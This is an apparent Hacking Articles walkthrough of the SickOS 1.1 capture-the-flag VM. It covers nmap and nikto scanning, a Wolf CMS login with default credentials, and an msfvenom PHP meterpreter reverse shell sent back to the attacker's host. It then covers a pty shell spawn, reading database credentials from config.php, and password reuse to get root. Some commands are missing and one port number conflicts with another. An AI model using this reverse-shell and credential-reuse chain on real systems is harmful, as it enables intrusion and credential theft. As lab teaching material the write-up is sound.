This time we are going to crack SickOS 1.1 in the Boot2root challenges. This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. The objective being to compromise the network/machine and gain Administrative/root privileges on them.
We will start off by finding the target.
Our target IP is 192.168.0.101. Now we scan the IP by Nmap.
nmap –p- -A 192.168.0.101
The ports that we found open are 22, 3812 and 8080. Here, if you try to open the said VM in the browser then nothing will open and you will find nothing. So, now we will use nikto.
nikto –h 192.168.0.101:3128
Nikto will help us find a text file called Robots.txt. Let’s try and open it in the browser.
This tells us something about /wolfcms that means this website is made in Wolf CMS and/or there is a directory with the name of /wolfcms. Now we try and opened it on the browser but we failed. If you had have observed during nmap that there was something about proxy on 3128. So we will try and set up manual proxy. Give the IP of the VM in the HTTP Proxy and the port 3128
After the proxy has been set up open it in the website as the link: 192.168.0.101/wolfcms/
The page will open as above indicating that it has been made in Wolf CMS. I don’t know much about Wolf CMS so I searched google to know where admin page resides.
As I found the log in page through google, I opened it. And it was asking me for username and password. By default the username and password is admin and admin respectively.
I used the by default username and password and I logged in to the page shown below. Here, select files tab and then select upload files option.
Here, we need to upload the malicious file and to generate it open your terminal in kali and type :
Msfvenom –p php/meterpreter/reverse_tcp lhost =192.168.0.103 lport=4444 –f raw
Copy the code from <?php to die(); and paste it to a text file with the extension .php. Upload the said file.
Now before running the file run multi/handler in metasploit by typing:
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
As you hit enter, run the file too and you will have your session and once you have it, go to the shell and type :
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py
After doing the above, you will enter a user of our target and to know what files and directories are their type :
Then read the config.php by typing :
Reading th config.php file will give you all the details about the databse including username and password i.e root and [email protected] respectively.
Moving further read the password file and to do so type :
Observe all the user details it gives us and you will find that user sickos has the value of 1000:1000 that means that this is the first user. So, we might find ouor here as it is the first user. Therefore, switch user to sickos with the password [email protected] that we found.
Then type the following command to see the ID’s :
Now we need root access and for that type :
And give the password [email protected] again. And to confirm that you have entered root type :
Futhermore we need to go into /root to look for the flag so for that run the set of following commands :
Here, you will find a text find. Let’s read it.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.